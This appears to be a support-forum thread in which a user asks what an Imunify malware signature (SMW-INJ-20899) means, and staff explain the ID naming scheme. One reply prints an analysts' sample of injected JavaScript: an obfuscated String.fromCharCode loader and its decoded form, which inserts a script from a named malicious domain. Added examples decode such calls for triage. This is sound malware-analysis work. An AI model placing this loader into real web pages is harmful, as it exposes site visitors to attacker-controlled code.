Lookup definition for malware signature

  • Lookup definition for malware signature

    Hey Imunify-Community!

    Is there a simple way to look up what the infection for a specific scan result means in detail?

    Example:
    SMW-INJ-20899-js.spam.redi-2

    Okay, that means "Server Side Malware, JavaScript, Spam, Redirect" ... but what does the infection for "20899" look like in detail? By inspecting the files I cannot find any malicious code :-/

    Thanks for your reply!


  • #2
    Hello Steffen,

    Thank you for asking! If it is an injection, then it is possible to compare two files before and after clean-up, although there is no simple way to query this information from scan results. The naming convention is described in our documentation. Here is a short passage from it:

    You can derive some information from the signature ID itself. SMW-SA-05155-wshll – in this Signature ID:
    • The first section can be either SMW or CMW. SMW stands for Server Malware and CMW stands for Client Malware
    • The second section of ID can be either INJ or SA. INJ stands for Injection (means Malware is Injected into some legitimate file) and SA stands for StandAlone (means File is Completely Malicious)
    • The third section is 05155. This is simply an identification number for the signature.
    • The fourth section wshll/mlw.wp/etc explains the category and class of malware identified. Here, wshll stands for web shell (mlw stands for malware).
    • The fifth section is 0, which provides the version number of the signature.


    I don't have an answer on what exactly signature number 20899 cleans; such a scenario implies submitting a false positive:
    https://cloudlinux.zendesk.com/hc/en-us/articles/360011906013-How-to-submit-a-false-positive-negative-result-for-malware-scanner-

    Having said this, injections are sometimes easy to miss, please provide the sample. Maybe I can get a bit more information regarding the injection from our malware analysts.

    Thank you for drawing our attention to this matter; we will likely create an additional KCS article to describe these nuances.

    Comment
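The naming convention quoted in the reply above is regular enough to parse mechanically. The following is an added example, not Imunify's own code or tooling: a small parser that splits a signature ID into the five sections the documentation describes and validates each one. The function names (`parseSignatureId`, `describeSignatureId`) and the handling of a missing fifth section (treated as version 0, since the quoted passage says the version of `SMW-SA-05155-wshll` is 0) are assumptions made for this example; only the abbreviations named in the thread (SMW, CMW, INJ, SA, wshll, mlw) are expanded.

```javascript
// Added example, not Imunify's code: parse an Imunify signature ID.
// Format per the documentation passage quoted in the thread:
//   <SMW|CMW>-<INJ|SA>-<number>-<category[.class...]>[-<version>]
// Assumption for this example: when the fifth section is absent, version is 0.
const SOURCE = { SMW: "Server Malware", CMW: "Client Malware" };
const KIND = {
  INJ: "Injection (malware injected into a legitimate file)",
  SA: "StandAlone (the whole file is malicious)",
};
// Only the category abbreviations named in the thread are expanded;
// anything else is reported verbatim.
const CATEGORY = { wshll: "web shell", mlw: "malware" };

const DIGITS = /^\d+$/;

function parseSignatureId(id) {
  const parts = id.trim().split("-");
  if (parts.length < 4 || parts.length > 5) {
    throw new Error(`unexpected number of sections in signature ID: ${id}`);
  }
  const [src, kind, num, category, version = "0"] = parts;
  if (!(src in SOURCE)) throw new Error(`unknown first section: ${src}`);
  if (!(kind in KIND)) throw new Error(`unknown second section: ${kind}`);
  if (!DIGITS.test(num)) throw new Error(`signature number is not numeric: ${num}`);
  if (!DIGITS.test(version)) throw new Error(`version is not numeric: ${version}`);

  // The fourth section carries the category first, then zero or more
  // dot-separated classes (e.g. "mlw.wp" or "js.spam.redi").
  const [cat, ...classes] = category.split(".");
  return {
    source: SOURCE[src],
    kind: KIND[kind],
    number: Number(num),        // "05155" -> 5155; leading zeros carry no meaning
    category: cat,
    categoryName: CATEGORY[cat] || cat,
    classes,
    version: Number(version),
  };
}

// One-line human-readable summary, useful when triaging scan reports.
function describeSignatureId(id) {
  const p = parseSignatureId(id);
  const cls = p.classes.length ? `, class ${p.classes.join("/")}` : "";
  return `${p.source}; ${p.kind}; signature #${p.number}; ` +
         `category ${p.categoryName}${cls}; version ${p.version}`;
}

// Usage with the two IDs that appear in this thread:
console.log(describeSignatureId("SMW-INJ-20899-js.spam.redi-2"));
console.log(describeSignatureId("SMW-SA-05155-wshll"));
```

Note that the parser tells you only what the ID encodes (source, injection vs. standalone, number, category, version); as the reply says, the actual detection logic behind the number is not recoverable from the ID itself.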


    • #3
      Thank you for your quick reply. On the specific server, we use Imunify+, so there is no CLI to submit a false positive file for checking. I could provide you a sample file, but not here in the forum. I can also provide you the malicious WordPress plug-in by which the server had been infected a day before. I cleaned up everything as far as possible. Other tools did not find any more infections, but Imunify+ reports it at every scan. I also cannot add an exclusion, as the infection is detected within cached files.

      Is there an e-mail address we can correspond on?

      Kind regards,
      Steffen

      Comment


      • #4
        Me again, Steffen,

        I wanted to update you regarding the signature 20899. Our malware analysts, based on their samples, provided the following example:
        Code:
        // Check whether a <script> with the loader's marker id is already present
        var scripts = document.getElementsByTagName("script");
        var wantmee = false;
        for (var i = 0; i < scripts.length; i++) {
          if (scripts[i].id) {
            if (scripts[i].id == "trackthisposition") { wantmee = true; }
          }
        }
        // If not, inject it; the remote URL is hidden behind String.fromCharCode
        if (wantmee == false) {
          var d = document;
          var s = d.createElement('script');
          s.id = "trackthisposition";
          s.async = true;
          s.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,105,109,112,108,101,46,99,111,102,111,117,110,100,101,114,115,112,101,99,105,97,108,115,46,99,111,109,47,115,116,114,111,110,103,46,106,115,63,118,61,51,46,48,48);
          // Insert next to the injecting script if possible, otherwise into <head>
          if (document.currentScript) {
            document.currentScript.parentNode.insertBefore(s, document.currentScript);
          } else {
            d.getElementsByTagName('head')[0].appendChild(s);
          }
        }
        If you look at String.fromCharCode, after deobfuscation it effectively results in the following:
        Code:
        var scripts = document.getElementsByTagName("script");
        var wantme = false;
        for (var i = 0; i < scripts.length; i++) {
          if (scripts[i].id) {
            if (scripts[i].id == "trackmyposs") { wantme = true; }
          }
        }
        if (wantme == false) {
          var d = document;
          var s = d.createElement('script');
          s.id = "trackmyposs";
          // Remote loader URL, no longer encoded
          s.src = 'https://collect.greengoplatform.com/flag.js?v=7.1.3';
          if (document.currentScript) {
            document.currentScript.parentNode.insertBefore(s, document.currentScript);
          } else {
            d.getElementsByTagName('head')[0].appendChild(s);
          }
        }
        The encoded URL is known to be malicious. Such techniques are often used with malware injects.

        Should you have more questions, please do not hesitate to ask.
        Last edited by mchernyavsky; 12-08-2022, 02:05 PM.

        Comment
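The deobfuscation step described in the reply above (turning a `String.fromCharCode(...)` argument list back into the URL it hides) can be automated when triaging a flagged file. The following is an added example, not Imunify's code or its detection logic: it scans JavaScript source for `String.fromCharCode` calls whose arguments are all numeric literals, decodes each one, and reports those that decode to a URL. It goes slightly beyond the thread's sample by also accepting hexadecimal literals (`0x68`). The sample input is constructed for this example and uses the reserved `example.invalid` domain, so the decoded URL is a placeholder, not a real indicator; the function names `decodeFromCharCodeCalls` and `extractLoaderUrls` are this example's own.

```javascript
// Added example, not Imunify's code: statically decode String.fromCharCode(...)
// calls in a JavaScript sample and report any that decode to a URL.

// Constructed sample in the style of the injection shown in this thread.
// The decoded domain is the reserved placeholder example.invalid, not a real host.
const CONSTRUCTED_SAMPLE = [
  "var d=document;var s=d.createElement('script');",
  "s.id=String.fromCharCode(0x74,0x72,0x61,0x63,0x6b);",
  "s.src=String.fromCharCode(104,116,116,112,115,58,47,47,108,111,97,100,101,114,46," +
    "101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,115,116,114,111,110,103,46,106,115);",
  "d.getElementsByTagName('head')[0].appendChild(s);",
].join("\n");

// Matches String.fromCharCode( ... ) with an argument list free of nested
// parentheses; calls with computed arguments are skipped below anyway.
const FROM_CHAR_CODE = /String\s*\.\s*fromCharCode\s*\(([^)]*)\)/g;
const NUMERIC_LITERAL = /^(0x[0-9a-f]+|\d+)$/i;

function decodeFromCharCodeCalls(source) {
  const results = [];
  for (const match of source.matchAll(FROM_CHAR_CODE)) {
    const args = match[1]
      .split(",")
      .map((a) => a.trim())
      .filter((a) => a.length > 0);
    // Only a call whose arguments are all decimal or 0x hex literals can be
    // decoded without executing the script.
    if (args.length === 0 || !args.every((a) => NUMERIC_LITERAL.test(a))) continue;
    const decoded = String.fromCharCode(...args.map((a) => Number(a)));
    results.push({
      offset: match.index,                         // where the call sits in the sample
      decoded,
      isUrl: /^https?:\/\//i.test(decoded),        // a decoded URL is the interesting case
    });
  }
  return results;
}

// Convenience wrapper: just the URLs that were hidden behind fromCharCode.
function extractLoaderUrls(source) {
  return decodeFromCharCodeCalls(source)
    .filter((r) => r.isUrl)
    .map((r) => r.decoded);
}

// Usage against the constructed sample:
for (const r of decodeFromCharCodeCalls(CONSTRUCTED_SAMPLE)) {
  console.log(`offset ${r.offset}: ${JSON.stringify(r.decoded)}${r.isUrl ? "  <- URL" : ""}`);
}
```

Pointing the same function at the `Code:` block above yields the URL hidden in that sample's `fromCharCode` call. Keep in mind this only handles the literal-argument form; loaders that build the character list at runtime (arithmetic, `split`/`map` chains, `atob`) need a sandboxed execution or a proper AST-based evaluator rather than a regular expression.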
